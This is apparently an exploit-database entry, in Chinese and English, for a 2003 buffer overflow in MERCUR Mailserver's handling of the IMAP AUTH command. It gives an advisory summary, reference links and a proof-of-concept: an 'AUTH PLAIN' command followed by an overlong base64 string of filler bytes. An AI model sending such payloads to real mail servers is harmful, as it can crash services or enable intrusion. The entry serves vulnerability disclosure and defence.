https://www.exploit-db.com/exploits/23267
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-089

AtriumSoftwareMercurMailserver是一款邮件服务程序。MercurMailserver在处理IMAPAUTH命令时存在问题，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以服务进程权限在系统上执行任意指令。攻击者提交超长IMAPAUTH命令可触发此漏洞，目前没有详细漏洞细节提供。

source: http://www.securityfocus.com/bid/8861/info

A problem has been reported in MERCUR Mailserver when handling the IMAP AUTH command. The issue occurs when an overly long command is submitted, which may be due to a buffer overrun. This problem may make it possible for an attacker to gain unauthorized access to a vulnerable system. 

On the IMAP port:

AUTH PLAIN
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ

来源:SECUNIA
名称:10038
链接:http://secunia.com/advisories/10038
来源:XF
名称:mercur-auth-command-dos(13468)
链接:http://xforce.iss.net/xforce/xfdb/13468
来源:BID
名称:8889
链接:http://www.securityfocus.com/bid/8889
来源:BID
名称:8861
链接:http://www.securityfocus.com/bid/8861
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/6U00N1P8KC.html
来源:OSVDB
名称:2688
链接:http://www.osvdb.org/2688
来源:FULLDISC
名称:20031024VulnerabilityinMERCURMailServerv4.2SP3andbelow
链接:http://archives.neohapsis.com/archives/fulldisclosure/2003-q4/1459.html
来源:www.atrium-software.com
链接:http://www.atrium-software.com/mail%20server/pub/mcr42sp3a.html
来源：NSFOCUS
名称：5577
链接：http://www.nsfocus.net/vulndb/5577